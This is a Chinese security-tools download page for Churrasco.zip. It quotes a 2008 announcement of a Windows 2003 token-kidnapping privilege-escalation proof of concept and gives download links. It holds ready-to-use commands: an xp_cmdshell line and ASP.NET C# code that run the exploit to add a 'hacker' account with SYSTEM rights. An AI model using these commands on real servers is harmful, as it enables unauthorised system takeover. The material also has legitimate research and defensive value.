首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>攻击程序>软件详细
软件名称:  Churrasco.zip
文件类型:  .zip
界面语言:  英文软件
软件类型:  国外软件
运行环境:  Win2003,WinXP,Win2000,Win9X
授权方式:  共享软件
软件大小:  48KB
软件等级:  ★★★★☆
发布时间:  2008-10-09
官方网址: http://nomoreroot.blogspot.com 作者:Cerrudo
演示网址: http://nomoreroot.blogspot.com/2008/10/windows-200
软件说明:  
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.
下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·qwks.cpp(MS03-049)
·ms05039.rar
·fsie.rar
·Serv-U FTP溢出漏洞利用工具
·NBSI2破解版
·MS08-067.rar
·提权大杀器(2010黑帽大会公布的
·tfn2k.tgz
·SMBdie
·ms04-011.rar
·WinArpAttacker3.50.rar
·KiTrap0D.zip
  相关软件
·Dbshell
·MS08-021_Gdi.tgz
·MaxHijack 1.4
·ms08-067.zip
·MS08-067.rar
·ms08-066.rar
·BIND 9.5.0-P2 Remote DNS Cache
·Word Gmail Xss Exp
·smbrelay3.zip
·JCZ3.rar
·Epfw_Exp.zip
·Samba < 3.0.20 heap overflow
 
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved